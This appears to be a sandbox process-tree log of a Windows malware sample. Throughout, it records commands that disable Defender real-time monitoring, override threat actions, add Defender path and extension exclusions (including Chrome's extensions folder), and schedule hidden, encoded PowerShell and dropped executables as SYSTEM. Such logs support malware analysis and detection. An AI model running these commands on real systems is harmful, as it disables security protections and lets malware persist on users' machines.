C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:3108
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1652
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2732
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:3436
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:3712
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
PID:3192 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2964
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gThmyhCKc" /SC once /ST 15:46:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gThmyhCKc"3⤵PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gThmyhCKc"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:3324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1208
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵PID:3600
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghneQPntO" /SC once /ST 19:12:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghneQPntO"3⤵PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghneQPntO"3⤵PID:2164
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1524
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2384
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:3352
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 14:25:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\lKdXuMn.exe\" GH /nIqNdidXA 385118 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"3⤵PID:2536
-
-
-
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\wEeBLUP.exeC:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\wEeBLUP.exe it /hkKdidLTBl 385118 /S2⤵PID:1796
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2360
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2764
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2136
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:3964
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1876
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1980
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:3056
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:4036
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2112
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2644
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:3848
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1224
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2228
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
PID:1532 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:3368
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcNkjIruD" /SC once /ST 15:59:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcNkjIruD"3⤵PID:3288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcNkjIruD"3⤵PID:2644
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:752
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1552
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:2004 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵PID:3452
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:323⤵PID:848
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:324⤵PID:3324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:643⤵PID:4028
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:644⤵PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:323⤵PID:1560
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:324⤵PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:643⤵PID:3712
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:644⤵PID:3276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\nlECFbvN\UEMhcetwdKRcnOOL.wsf"3⤵PID:2384
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\nlECFbvN\UEMhcetwdKRcnOOL.wsf"3⤵PID:3764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:644⤵PID:2068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:324⤵PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:644⤵PID:2268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:324⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:644⤵PID:3720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:324⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:644⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:324⤵PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:644⤵PID:2720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:324⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:644⤵PID:3224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:324⤵PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:644⤵PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:324⤵PID:2288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:644⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:644⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:324⤵PID:3984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:644⤵PID:4036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:324⤵PID:3248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:644⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:324⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:644⤵PID:3208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:324⤵PID:3368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:644⤵PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:324⤵PID:3320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:644⤵PID:3324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:324⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:644⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:324⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:644⤵PID:576
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\NFpAHxv.exe\" GH /Nbicdidbs 385118 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:1456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"3⤵PID:2268
-
-
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\NFpAHxv.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\NFpAHxv.exe GH /Nbicdidbs 385118 /S2⤵PID:3192
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1244
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1568
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1656
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:4020
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:3008
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2448
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:3616
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:3084
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3348
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:3044
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2992
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2828
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:3140
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:3680
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:3860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
PID:4072 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:3664
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"3⤵PID:2668
-
-
